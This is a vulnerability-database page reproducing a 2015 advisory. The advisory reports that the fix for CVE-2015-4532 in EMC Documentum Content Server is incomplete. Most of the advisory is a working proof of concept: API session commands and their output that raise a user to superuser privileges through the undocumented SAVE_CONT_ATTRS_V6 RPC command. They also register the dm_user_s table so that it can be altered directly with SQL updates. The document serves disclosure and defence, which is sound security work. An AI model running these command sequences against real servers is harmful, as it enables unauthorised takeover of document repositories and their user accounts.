Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:32402
HistoryAug 24, 2015 - 12:00 a.m.

Privilege escalation through RPC commands in EMC Documentum Content Server (incomplete fix in CVE-2015-4532)

2015-08-2400:00:00
vulners.com
23
JSON

Product: EMC Documentum Content Server
Vendor: EMC
Version: ANY
CVE: N/A
Risk: High
Status: public/not fixed

For detailed description see attached VRF#HUFG9EBA.txt and VRF#HX5OLZ0F.txt, for vendor announcement see CVE-2015-4532 in http://seclists.org/bugtraq/2015/Aug/86. The problem is PoC code provided in VRF#HUFG9EBA.txt and VRF#HX5OLZ0F.txt misses two obvious points:

  1. Content Server supports about 400 undocumented RPC commands, but PoC code covers only 33 of them, for example, all versions of EMC Documentum Content Server support SAVE_CONT_ATTRS_V6 RPC command, this RPC command has the same behaviour as SAVE_CONT_ATTRS from VRF#HUFG9EBA.txt and hence it is vulnerable:

API> retrieve,c,dm_user where user_name=USER

11024be980000900
API> get,c,l,user_privileges

0
API> get,c,l,i_vstamp

1
API> apply,c,11024be980000900,SAVE_CONT_ATTRS_V6,
OBJECT_TYPE,S,dm_user,IS_NEW_OBJECT,B,F,
i_vstamp,I,1,user_privileges,I,16

q0
API> ?,c,q0
RESULT

      1

API> revert,c,l,

OK
API> get,c,l,user_privileges

16

  1. Creating malicious user with superuser privileges or malicious docbase method is not the only option to escalate privileges, demonstration:


– acquiring r_object_id for brand new
– dm_registered object

API> apply,c,NEXT_ID_LIST,TAG,I,25,HOW_MANY,I,1

q0
API> ?,c,q0
next_id

19024be98001fd0b
(1 row affected)


– Creating brand new dm_registered object

API> apply,c,19024be98001fd0b,SysObjSave,
OBJECT_TYPE,S,dm_registered,
IS_NEW_OBJECT,B,T,
i_vstamp,I,0,
table_name,S,dm_user_s,
table_owner,S,repo,
owner_name,S,repo,
world_permit,I,7,
object_name,S,dm_user_s,
owner_table_permit,I,15,
group_table_permit,I,15,
world_table_permit,I,15,
r_object_type,S,dm_registered

q0
API> ?,c,q0
result

      1

(1 row affected)


– Now attacker is able to modify database tables

API> ?,c,select count() from dm_dbo.dm_user_s
count()

             7930

(1 row affected)

API> ?,c,update dm_dbo.dm_user_s set user_privileges=16
where user_name=USER
rows_updated

      1

(1 row affected)

API> ?,c,select user_privileges from dm_dbo.dm_user_s
where user_name=USER
user_privileges

        16

(1 row affected)

__
Regards,
Andrey B. Panfilov

Related

zdt 1
securityvulns 3
packetstorm 1
prion 2
cve 2
nessus 1
zdt
zdt
EMC Documentum Content Server Code Execution Vulnerability
2015-08-19 00:00:00
securityvulns
securityvulns
EMC Documentum Content Server: arbitrary code execution (incomplete fix in CVE-2015-4532)
2015-08-24 00:00:00
ESA-2015-131: EMC Documentum Content Server Multiple Vulnerabilities
2015-08-24 00:00:00
EMC Documentum multiple security vulnerabilities
2015-09-14 00:00:00
packetstorm
packetstorm
EMC Documentum Content Server Code Execution
2015-08-18 00:00:00
prion
prion
Design/Logic Flaw
2017-04-21 02:59:00
Authorization
2015-08-20 10:59:00
cve
cve
CVE-2015-4532
2015-08-20 10:59:00
CVE-2017-7220
2017-04-21 02:59:00
nessus
nessus
EMC Documentum Content Server Multiple Vulnerabilities (ESA-2015-131)
2015-08-19 00:00:00
JSON
Related for SECURITYVULNS:DOC:32402
zdt1securityvulns3packetstorm1prion2cve2nessus1